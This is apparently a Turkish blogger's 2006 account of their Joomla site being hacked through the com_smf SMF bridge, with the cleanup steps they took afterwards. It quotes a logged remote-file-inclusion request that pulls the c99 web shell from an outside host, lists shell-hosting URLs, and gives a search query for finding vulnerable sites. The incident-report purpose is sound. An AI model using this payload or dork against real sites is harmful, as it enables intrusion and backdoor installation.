Sitemizi hacklediler.. Sanıyorum önce google’dan smf kullanan siteleri aratıyorlar.
http://www.google.com.tr/search?q=/com_smf/&hl=tr&lr=lang_tr&start=20&sa=N
sonra bizim siteye giriyorlar.
Loglardan anladığım kadarıyla
85.107.6.1 – - [27/Aug/2006:15:03:18 +0300] “GET /components/com_smf/smf.php?mosConfig_absolute_path=http://arizona.t35.com/c99.txt? HTTP/1.1″ 200 29 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
http://neuromancer.kayyo.com/c99.txt
http://arizona.t35.com/c99.txt
belli ki tüm olay c99 ‘dan kaynaklanıyor..
açık smf’den mi kaynaklanıyordu ( hayır smf’den deÄŸil com_smf yani smf bridge den kaynaklanıyormuÅŸ. bende artık bunu kullanmak istemiyor. o yüzden kaldırdım) emin deÄŸilim. ÅŸu anda smf’nin en güncel sürümüne yükselttim fakat veritabanını utf8 ‘e çevirince sitede karakter problemi çıktı. ( bu problemde com_smf bridge kalkınca düzeldi )
şimdi smf forumun kendi sitesinde gördüm onlar yeni çıkan smf için kendileri bir bridge yazmışlar. http://www.simplemachines.org/community/index.php?topic=107585.0
hackten sonra tüm dosyaları tarih sırasına göre sıralayan php dosyasını kullanarak exploitleri buldum. Â
exploit dosyalarını mambots ve images/stories/file içinde buldum. yedekli çalışmış elemanlar..
tüm klasör izinlerini kontrol edip 777 varsa 755′e çevirdim.
SONUÇ: utanç içinde joomla security forumlarında gördüm ki Türkler bu konuda bir numara olmuÅŸ. Hiç bir faydası olmayan bu iÅŸlerle uÄŸraşıyorlar. Sanıyorum asıl hack olayını saÄŸlayacak kodu yazan ruslar.. BU tür lamer bir iÅŸle uÄŸÅŸarak “açık var düzeltin” gibi yazı yazmak yerine kendileri bir yazı veya kod yazsalar çok daha güzel olacak.
register_globals.php güvenli değil. bunu düzeltmek gerekiyor. sanıyorum tüm sorunlar bundan kaynaklanıyor.
Recent Comments